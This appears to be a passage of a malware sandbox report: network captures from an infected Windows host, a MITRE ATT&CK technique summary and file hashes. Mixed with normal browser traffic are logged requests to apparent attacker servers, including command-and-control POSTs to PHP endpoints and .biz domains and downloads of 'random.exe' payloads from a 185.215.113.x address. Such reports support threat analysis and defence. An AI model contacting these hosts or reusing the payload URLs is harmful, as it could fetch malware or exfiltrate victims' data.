Set-Cookie: PHPSESSID=818nekq9tromapg55ognkmvp1m; expires=Tue, 01-Apr-2025 20:31:36 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GmB2wHyeXmsnZ1romxLQMt4Wz1ymSdqVhPFQY6GVX7RWC3EbZ7c1al2bJbD4ZA9UFS5r9GduDWoYTrMwSbKT3Of3re284aNonUxDazIFTFTmOoI5WCEvC1sYin45kFaGUVFxaKk%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ee12d416cb6cd22-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=32189&min_rtt=26250&rtt_var=17042&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2863&recv_bytes=586&delivery_rate=130669&cwnd=242&unsent_bytes=0&cid=02f989390392c673&ts=325&x=0"
-
Remote address:8.8.8.8:53Requestse-blurry.bizIN AResponsese-blurry.bizIN A172.67.162.65se-blurry.bizIN A104.21.81.153
-
Remote address:172.67.162.65:443RequestPOST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: se-blurry.biz
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=kmltkhneqv2e17ahnjbfre8p2m; expires=Tue, 01-Apr-2025 20:31:36 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eBRdLQqQSDJAlPFPKFclw3XL6KXS7A9OIzLWatZzMef5woeqzFgPcANHIOmRDL3nj8ClcsnCmaTDYbeSHB6yi7C6Z3RQSvQtpSRqg%2BAKEM8iApHttcPskEAP%2BG5sRhBI"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ee12d43caad48b9-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=27330&min_rtt=25758&rtt_var=8277&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=581&delivery_rate=134431&cwnd=253&unsent_bytes=0&cid=d323d40f3982bf5f&ts=231&x=0"
-
Remote address:8.8.8.8:53Requestzinc-sneark.bizIN AResponsezinc-sneark.bizIN A172.67.136.167zinc-sneark.bizIN A104.21.62.142
-
Remote address:172.67.136.167:443RequestPOST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: zinc-sneark.biz
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=inEuN20ha1ELB9jct%2BaMlWIAz6QkGeJZTP5pUrTefpGVnq91IJh%2BPoKR2O%2BJlE9OjGowL4rcYXpozbX1j70WUHrWv8rC%2BaX%2FTRgHN4ARpo2DQI3a6HS%2FjCAjsvCcgvJd4vo%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ee12d464d40ed0b-LHR
-
Remote address:172.67.136.167:443RequestPOST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Cookie: __cf_mw_byp=qNIp90r.SHEYd_qmd_KFOgLmKOCHrYk2Bq1ZNwN6MgY-1733539497-0.0.1.1-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 53
Host: zinc-sneark.biz
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=fomo9eenelmm8fnrnbp8g375qt; expires=Tue, 01-Apr-2025 20:31:37 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cVG8hh10C4NXOm3Jk4bH3E%2BPfc9eUtCkZRWkb8QIwv1H%2Bnsq8ztyqs1NbYBIiUirGXwmfmOHjG8uzrP3AFH3Z%2FLyk6WxmhI%2BQRpNRQUKYfWdLdwZZSfXo1beOdGRG7kPYu0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ee12d48b8d0ed0b-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=33308&min_rtt=28239&rtt_var=7219&sent=13&recv=12&lost=0&retrans=0&sent_bytes=8127&recv_bytes=1057&delivery_rate=286538&cwnd=257&unsent_bytes=0&cid=786a4ddf764d5cb4&ts=656&x=0"
-
Remote address:185.215.113.206:80RequestGET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:185.215.113.206:80RequestPOST /c4becf79229cb002.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BGHCGCAEBFIJKFIDBGHD
Host: 185.215.113.206
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:8.8.8.8:53Requestyoutube.comIN AResponseyoutube.comIN A216.58.213.14
-
Remote address:8.8.8.8:53Requestspocs.getpocket.comIN AResponsespocs.getpocket.comIN CNAMEprod.ads.prod.webservices.mozgcp.netprod.ads.prod.webservices.mozgcp.netIN A34.117.188.166
-
Remote address:8.8.8.8:53Requestgetpocket.cdn.mozilla.netIN AResponsegetpocket.cdn.mozilla.netIN CNAMEgetpocket-cdn.prod.mozaws.netgetpocket-cdn.prod.mozaws.netIN CNAMEprod.pocket.prod.cloudops.mozgcp.netprod.pocket.prod.cloudops.mozgcp.netIN A34.120.5.221
-
Remote address:216.58.213.14:443RequestGET /account?=https://accounts.google.com/v3/signin/challenge/pwd HTTP/2.0
host: youtube.com
user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
upgrade-insecure-requests: 1
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: none
sec-fetch-user: ?1
te: trailers
-
Remote address:8.8.8.8:53Requestyoutube.comIN AResponseyoutube.comIN A216.58.213.14
-
GEThttps://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US®ion=GB&count=30firefox.exeRemote address:34.120.5.221:443RequestGET /v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US®ion=GB&count=30 HTTP/2.0
host: getpocket.cdn.mozilla.net
user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
if-none-match: W/"5388-z4f7VxffVE065aqbcDCq/QMZNSc"
te: trailers
-
Remote address:8.8.8.8:53Requestprod.pocket.prod.cloudops.mozgcp.netIN AResponseprod.pocket.prod.cloudops.mozgcp.netIN A34.120.5.221
-
Remote address:8.8.8.8:53Requestprod.ads.prod.webservices.mozgcp.netIN AResponseprod.ads.prod.webservices.mozgcp.netIN A34.117.188.166
-
Remote address:8.8.8.8:53Requestyoutube.comIN AAAAResponseyoutube.comIN AAAA2a00:1450:4009:816::200e
-
Remote address:8.8.8.8:53Requestprod.pocket.prod.cloudops.mozgcp.netIN AAAAResponseprod.pocket.prod.cloudops.mozgcp.netIN AAAA2600:1901:0:524c::
-
Remote address:8.8.8.8:53Requestprod.ads.prod.webservices.mozgcp.netIN AAAAResponse
-
Remote address:8.8.8.8:53Requestprod.content-signature-chains.prod.webservices.mozgcp.netIN AResponseprod.content-signature-chains.prod.webservices.mozgcp.netIN A34.160.144.191
-
Remote address:8.8.8.8:53Requestprod.content-signature-chains.prod.webservices.mozgcp.netIN AAAAResponseprod.content-signature-chains.prod.webservices.mozgcp.netIN AAAA2600:1901:0:92a9::
-
Remote address:8.8.8.8:53Requestshavar.prod.mozaws.netIN AResponseshavar.prod.mozaws.netIN A52.32.237.164shavar.prod.mozaws.netIN A52.33.23.190shavar.prod.mozaws.netIN A44.226.106.83
-
Remote address:8.8.8.8:53Requestshavar.prod.mozaws.netIN AAAAResponse
-
Remote address:8.8.8.8:53Requestwww.youtube.comIN AResponsewww.youtube.comIN CNAMEyoutube-ui.l.google.comyoutube-ui.l.google.comIN A172.217.169.78youtube-ui.l.google.comIN A216.58.213.14youtube-ui.l.google.comIN A216.58.201.110youtube-ui.l.google.comIN A216.58.212.206youtube-ui.l.google.comIN A172.217.169.14youtube-ui.l.google.comIN A142.250.200.46youtube-ui.l.google.comIN A142.250.187.206youtube-ui.l.google.comIN A172.217.16.238youtube-ui.l.google.comIN A142.250.179.238youtube-ui.l.google.comIN A142.250.178.14youtube-ui.l.google.comIN A172.217.169.46youtube-ui.l.google.comIN A142.250.200.14youtube-ui.l.google.comIN A142.250.180.14youtube-ui.l.google.comIN A216.58.204.78youtube-ui.l.google.comIN A142.250.187.238
-
Remote address:8.8.8.8:53Requestprod.remote-settings.prod.webservices.mozgcp.netIN AResponseprod.remote-settings.prod.webservices.mozgcp.netIN A34.149.100.209
-
Remote address:8.8.8.8:53Requestyoutube-ui.l.google.comIN AResponseyoutube-ui.l.google.comIN A142.250.178.14youtube-ui.l.google.comIN A172.217.169.14youtube-ui.l.google.comIN A142.250.180.14youtube-ui.l.google.comIN A142.250.187.206youtube-ui.l.google.comIN A172.217.169.78youtube-ui.l.google.comIN A142.250.200.14youtube-ui.l.google.comIN A216.58.204.78youtube-ui.l.google.comIN A142.250.179.238youtube-ui.l.google.comIN A216.58.201.110youtube-ui.l.google.comIN A142.250.187.238youtube-ui.l.google.comIN A172.217.169.46youtube-ui.l.google.comIN A172.217.16.238youtube-ui.l.google.comIN A216.58.213.14youtube-ui.l.google.comIN A216.58.212.206youtube-ui.l.google.comIN A142.250.200.46
-
Remote address:8.8.8.8:53Requestprod.remote-settings.prod.webservices.mozgcp.netIN AAAAResponse
-
Remote address:8.8.8.8:53Requestyoutube-ui.l.google.comIN AAAAResponseyoutube-ui.l.google.comIN AAAA2a00:1450:4009:819::200eyoutube-ui.l.google.comIN AAAA2a00:1450:4009:817::200eyoutube-ui.l.google.comIN AAAA2a00:1450:4009:80a::200eyoutube-ui.l.google.comIN AAAA2a00:1450:4009:818::200e
-
Remote address:8.8.8.8:53Requestconsent.youtube.comIN AResponseconsent.youtube.comIN A142.250.200.14
-
GEThttps://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1firefox.exeRemote address:142.250.200.14:443RequestGET /m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1 HTTP/2.0
host: consent.youtube.com
user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
cookie: SOCS=CAAaBgiAoM66Bg
cookie: YSC=XAJHfiMqzLQ
cookie: __Secure-YEC=Cgt5cVZqVnpxYWY5NCi57c66BjIKCgJHQhIEGgAgFw%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgFw%3D%3D
upgrade-insecure-requests: 1
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: none
sec-fetch-user: ?1
te: trailers
-
Remote address:8.8.8.8:53Requestconsent.youtube.comIN AResponseconsent.youtube.comIN A142.250.200.14
-
Remote address:8.8.8.8:53Requestconsent.youtube.comIN AAAAResponseconsent.youtube.comIN AAAA2a00:1450:4009:822::200e
-
Remote address:8.8.8.8:53Requestfirefox-settings-attachments.cdn.mozilla.netIN AResponsefirefox-settings-attachments.cdn.mozilla.netIN CNAMEattachments.prod.remote-settings.prod.webservices.mozgcp.netattachments.prod.remote-settings.prod.webservices.mozgcp.netIN A34.117.121.53
-
Remote address:8.8.8.8:53Requestattachments.prod.remote-settings.prod.webservices.mozgcp.netIN AResponseattachments.prod.remote-settings.prod.webservices.mozgcp.netIN A34.117.121.53
-
Remote address:8.8.8.8:53Requestattachments.prod.remote-settings.prod.webservices.mozgcp.netIN AAAAResponse
-
Remote address:8.8.8.8:53Requestwww.google.comIN AResponsewww.google.comIN A142.250.187.196
-
Remote address:142.250.187.196:443RequestGET /favicon.ico HTTP/2.0
host: www.google.com
user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://consent.youtube.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
-
Remote address:8.8.8.8:53Requestwww.google.comIN AResponsewww.google.comIN A142.250.187.196
-
Remote address:8.8.8.8:53Requestwww.google.comIN AAAAResponsewww.google.comIN AAAA2a00:1450:4009:81f::2004
-
Remote address:8.8.8.8:53Requestconsent.youtube.comIN AResponseconsent.youtube.comIN A142.250.200.14
-
Remote address:8.8.8.8:53Requestconsent.youtube.comIN AResponseconsent.youtube.comIN A142.250.200.14
-
Remote address:8.8.8.8:53Requestprod.balrog.prod.cloudops.mozgcp.netIN AResponseprod.balrog.prod.cloudops.mozgcp.netIN A35.244.181.201
-
Remote address:8.8.8.8:53Requestprod.balrog.prod.cloudops.mozgcp.netIN AAAAResponse
-
Remote address:8.8.8.8:53Requestprod.remote-settings.prod.webservices.mozgcp.netIN AResponseprod.remote-settings.prod.webservices.mozgcp.netIN A34.149.100.209
-
Remote address:8.8.8.8:53Requestciscobinary.openh264.orgIN AResponseciscobinary.openh264.orgIN CNAMEa21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.coma21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.comIN CNAMEa17.rackcdn.coma17.rackcdn.comIN CNAMEa17.rackcdn.com.mdc.edgesuite.neta17.rackcdn.com.mdc.edgesuite.netIN CNAMEa19.dscg10.akamai.neta19.dscg10.akamai.netIN A88.221.134.209a19.dscg10.akamai.netIN A88.221.134.155
-
GEThttp://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zipfirefox.exeRemote address:88.221.134.209:80RequestGET /openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip HTTP/1.1
Host: ciscobinary.openh264.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
ResponseHTTP/1.1 200 OK
ETag: 85430baed3398695717b0263807cf97c
Content-Length: 453023
Accept-Ranges: bytes
X-Timestamp: 1731034347.00215
Content-Type: application/zip
X-Trans-Id: tx264693c458e9421d8a991-006730bfe7dfw1
Cache-Control: public, max-age=61851
Expires: Sat, 07 Dec 2024 19:56:26 GMT
Date: Sat, 07 Dec 2024 02:45:35 GMT
Connection: keep-alive
-
Remote address:8.8.8.8:53Requesta19.dscg10.akamai.netIN AResponsea19.dscg10.akamai.netIN A88.221.134.155a19.dscg10.akamai.netIN A88.221.134.209
-
Remote address:8.8.8.8:53Requesta19.dscg10.akamai.netIN AAAAResponsea19.dscg10.akamai.netIN AAAA2a02:26f0:a1::58dd:869ba19.dscg10.akamai.netIN AAAA2a02:26f0:a1::58dd:86d1
-
Remote address:8.8.8.8:53Requestredirector.gvt1.comIN AResponseredirector.gvt1.comIN A142.250.180.14
-
Remote address:8.8.8.8:53Requestredirector.gvt1.comIN AResponseredirector.gvt1.comIN A142.250.180.14
-
Remote address:8.8.8.8:53Requestredirector.gvt1.comIN AAAAResponseredirector.gvt1.comIN AAAA2a00:1450:4009:81e::200e
-
Remote address:8.8.8.8:53Requestr1---sn-5hnekn76.gvt1.comIN AResponser1---sn-5hnekn76.gvt1.comIN CNAMEr1.sn-5hnekn76.gvt1.comr1.sn-5hnekn76.gvt1.comIN A209.85.226.6
-
Remote address:8.8.8.8:53Requestr1.sn-5hnekn76.gvt1.comIN AResponser1.sn-5hnekn76.gvt1.comIN A209.85.226.6
-
Remote address:8.8.8.8:53Requestr1.sn-5hnekn76.gvt1.comIN AAAAResponser1.sn-5hnekn76.gvt1.comIN AAAA2a00:1450:400e::6
-
Remote address:8.8.8.8:53Requestplay.google.comIN AResponseplay.google.comIN A142.250.179.238
-
Remote address:142.250.179.238:443RequestPOST /log?hasfast=true&authuser=0&format=json HTTP/2.0
host: play.google.com
user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://consent.youtube.com/
content-type: text/plain;charset=UTF-8
content-length: 743
origin: https://consent.youtube.com
sec-fetch-dest: empty
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
-
Remote address:8.8.8.8:53Requestplay.google.comIN AResponseplay.google.comIN A142.250.179.238
-
Remote address:8.8.8.8:53Requestplay.google.comIN AAAAResponseplay.google.comIN AAAA2a00:1450:4009:81d::200e
-
Remote address:8.8.8.8:53Requestconsent.youtube.comIN AResponseconsent.youtube.comIN A142.250.200.14
-
Remote address:8.8.8.8:53Requestconsent.youtube.comIN AResponseconsent.youtube.comIN A142.250.200.14
-
2.2kB 2.0kB 22 12
HTTP Request
POST http://185.215.113.43/Zu7JuNko/index.phpHTTP Response
200HTTP Request
POST http://185.215.113.43/Zu7JuNko/index.phpHTTP Response
200HTTP Request
POST http://185.215.113.43/Zu7JuNko/index.phpHTTP Response
200HTTP Request
POST http://185.215.113.43/Zu7JuNko/index.phpHTTP Response
200HTTP Request
POST http://185.215.113.43/Zu7JuNko/index.phpHTTP Response
200HTTP Request
POST http://185.215.113.43/Zu7JuNko/index.phpHTTP Response
200 -
221.6kB 11.1MB 4448 7922
HTTP Request
GET http://185.215.113.16/luma/random.exeHTTP Response
200HTTP Request
GET http://185.215.113.16/steam/random.exeHTTP Response
200HTTP Request
GET http://185.215.113.16/well/random.exeHTTP Response
200HTTP Request
GET http://185.215.113.16/off/random.exeHTTP Response
200 -
982 B 4.4kB 9 9
HTTP Request
POST https://atten-supporse.biz/apiHTTP Response
200 -
977 B 4.3kB 9 9
HTTP Request
POST https://se-blurry.biz/apiHTTP Response
200 -
1.7kB 9.9kB 14 16
HTTP Request
POST https://zinc-sneark.biz/apiHTTP Response
403HTTP Request
POST https://zinc-sneark.biz/apiHTTP Response
200 -
727 B 625 B 5 5
HTTP Request
GET http://185.215.113.206/HTTP Response
200HTTP Request
POST http://185.215.113.206/c4becf79229cb002.phpHTTP Response
200 -
216.58.213.14:443https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdtls, http2firefox.exe1.9kB 9.0kB 14 19
HTTP Request
GET https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd -
34.120.5.221:443https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US®ion=GB&count=30tls, http2firefox.exe2.0kB 12.9kB 17 18
HTTP Request
GET https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US®ion=GB&count=30 -
977 B 6.9kB 10 8
-
-
-
142.250.200.14:443https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1tls, http2firefox.exe2.9kB 65.2kB 32 59
HTTP Request
GET https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1 -
1.8kB 21.3kB 19 26
-
1.8kB 7.5kB 14 18
HTTP Request
GET https://www.google.com/favicon.ico -
88.221.134.209:80http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.ziphttpfirefox.exe5.5kB 467.5kB 114 349
HTTP Request
GET http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zipHTTP Response
200 -
1.6kB 8.9kB 16 21
-
124.3kB 8.7MB 2288 6256
-
142.250.179.238:443https://play.google.com/log?hasfast=true&authuser=0&format=jsontls, http2firefox.exe2.8kB 8.7kB 18 20
HTTP Request
POST https://play.google.com/log?hasfast=true&authuser=0&format=json
-
64 B 96 B 1 1
DNS Request
atten-supporse.biz
DNS Response
104.21.16.9172.67.165.166
-
59 B 91 B 1 1
DNS Request
se-blurry.biz
DNS Response
172.67.162.65104.21.81.153
-
61 B 93 B 1 1
DNS Request
zinc-sneark.biz
DNS Response
172.67.136.167104.21.62.142
-
57 B 73 B 1 1
DNS Request
youtube.com
DNS Response
216.58.213.14
-
65 B 131 B 1 1
DNS Request
spocs.getpocket.com
DNS Response
34.117.188.166
-
71 B 174 B 1 1
DNS Request
getpocket.cdn.mozilla.net
DNS Response
34.120.5.221
-
57 B 73 B 1 1
DNS Request
youtube.com
DNS Response
216.58.213.14
-
82 B 98 B 1 1
DNS Request
prod.pocket.prod.cloudops.mozgcp.net
DNS Response
34.120.5.221
-
82 B 98 B 1 1
DNS Request
prod.ads.prod.webservices.mozgcp.net
DNS Response
34.117.188.166
-
57 B 85 B 1 1
DNS Request
youtube.com
DNS Response
2a00:1450:4009:816::200e
-
82 B 110 B 1 1
DNS Request
prod.pocket.prod.cloudops.mozgcp.net
DNS Response
2600:1901:0:524c::
-
82 B 175 B 1 1
DNS Request
prod.ads.prod.webservices.mozgcp.net
-
103 B 119 B 1 1
DNS Request
prod.content-signature-chains.prod.webservices.mozgcp.net
DNS Response
34.160.144.191
-
103 B 131 B 1 1
DNS Request
prod.content-signature-chains.prod.webservices.mozgcp.net
DNS Response
2600:1901:0:92a9::
-
68 B 116 B 1 1
DNS Request
shavar.prod.mozaws.net
DNS Response
52.32.237.16452.33.23.19044.226.106.83
-
68 B 153 B 1 1
DNS Request
shavar.prod.mozaws.net
-
3.7kB 11.0kB 10 14
-
61 B 335 B 1 1
DNS Request
www.youtube.com
DNS Response
172.217.169.78216.58.213.14216.58.201.110216.58.212.206172.217.169.14142.250.200.46142.250.187.206172.217.16.238142.250.179.238142.250.178.14172.217.169.46142.250.200.14142.250.180.14216.58.204.78142.250.187.238
-
94 B 110 B 1 1
DNS Request
prod.remote-settings.prod.webservices.mozgcp.net
DNS Response
34.149.100.209
-
69 B 309 B 1 1
DNS Request
youtube-ui.l.google.com
DNS Response
142.250.178.14172.217.169.14142.250.180.14142.250.187.206172.217.169.78142.250.200.14216.58.204.78142.250.179.238216.58.201.110142.250.187.238172.217.169.46172.217.16.238216.58.213.14216.58.212.206142.250.200.46
-
94 B 187 B 1 1
DNS Request
prod.remote-settings.prod.webservices.mozgcp.net
-
69 B 181 B 1 1
DNS Request
youtube-ui.l.google.com
DNS Response
2a00:1450:4009:819::200e2a00:1450:4009:817::200e2a00:1450:4009:80a::200e2a00:1450:4009:818::200e
-
3.3kB 9.2kB 7 9
-
65 B 81 B 1 1
DNS Request
consent.youtube.com
DNS Response
142.250.200.14
-
65 B 81 B 1 1
DNS Request
consent.youtube.com
DNS Response
142.250.200.14
-
65 B 93 B 1 1
DNS Request
consent.youtube.com
DNS Response
2a00:1450:4009:822::200e
-
90 B 177 B 1 1
DNS Request
firefox-settings-attachments.cdn.mozilla.net
DNS Response
34.117.121.53
-
106 B 122 B 1 1
DNS Request
attachments.prod.remote-settings.prod.webservices.mozgcp.net
DNS Response
34.117.121.53
-
4.0kB 10.6kB 9 14
-
106 B 199 B 1 1
DNS Request
attachments.prod.remote-settings.prod.webservices.mozgcp.net
-
60 B 76 B 1 1
DNS Request
www.google.com
DNS Response
142.250.187.196
-
60 B 76 B 1 1
DNS Request
www.google.com
DNS Response
142.250.187.196
-
60 B 88 B 1 1
DNS Request
www.google.com
DNS Response
2a00:1450:4009:81f::2004
-
3.1kB 9.3kB 6 10
-
65 B 81 B 1 1
DNS Request
consent.youtube.com
DNS Response
142.250.200.14
-
65 B 81 B 1 1
DNS Request
consent.youtube.com
DNS Response
142.250.200.14
-
82 B 98 B 1 1
DNS Request
prod.balrog.prod.cloudops.mozgcp.net
DNS Response
35.244.181.201
-
82 B 175 B 1 1
DNS Request
prod.balrog.prod.cloudops.mozgcp.net
-
94 B 110 B 1 1
DNS Request
prod.remote-settings.prod.webservices.mozgcp.net
DNS Response
34.149.100.209
-
70 B 286 B 1 1
DNS Request
ciscobinary.openh264.org
DNS Response
88.221.134.20988.221.134.155
-
67 B 99 B 1 1
DNS Request
a19.dscg10.akamai.net
DNS Response
88.221.134.15588.221.134.209
-
67 B 123 B 1 1
DNS Request
a19.dscg10.akamai.net
DNS Response
2a02:26f0:a1::58dd:869b2a02:26f0:a1::58dd:86d1
-
65 B 81 B 1 1
DNS Request
redirector.gvt1.com
DNS Response
142.250.180.14
-
65 B 81 B 1 1
DNS Request
redirector.gvt1.com
DNS Response
142.250.180.14
-
65 B 93 B 1 1
DNS Request
redirector.gvt1.com
DNS Response
2a00:1450:4009:81e::200e
-
3.2kB 9.3kB 7 10
-
71 B 116 B 1 1
DNS Request
r1---sn-5hnekn76.gvt1.com
DNS Response
209.85.226.6
-
69 B 85 B 1 1
DNS Request
r1.sn-5hnekn76.gvt1.com
DNS Response
209.85.226.6
-
69 B 97 B 1 1
DNS Request
r1.sn-5hnekn76.gvt1.com
DNS Response
2a00:1450:400e::6
-
1.8kB 5.9kB 5 7
-
61 B 77 B 1 1
DNS Request
play.google.com
DNS Response
142.250.179.238
-
61 B 77 B 1 1
DNS Request
play.google.com
DNS Response
142.250.179.238
-
61 B 89 B 1 1
DNS Request
play.google.com
DNS Response
2a00:1450:4009:81d::200e
-
3.3kB 9.3kB 8 10
-
65 B 81 B 1 1
DNS Request
consent.youtube.com
DNS Response
142.250.200.14
-
65 B 81 B 1 1
DNS Request
consent.youtube.com
DNS Response
142.250.200.14
-
2.3kB 3.4kB 4 8
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Defense Evasion
Impair Defenses
2Disable or Modify Tools
2Modify Registry
3Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bhg31lui.default-release\activity-stream.discovery_stream.json.tmp
Filesize32KB
MD510877cecf018f6bea78dbb175b4776e8
SHA15274367db25fae477a55542b5581986555fc2bc3
SHA2564d4acab60bbb83010fdad81c1befdc0f4ce5bb8ad1880350bb2ffaa7d854269e
SHA51248af6543963d43a2c754c0dc893db6d0522f3e4131b936d8382fa100dacfae4973ec7a3b2c0ac0e332eba6a2c295afa10ed51f78a06eeed432845e5d90151f0c
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bhg31lui.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
Filesize15KB
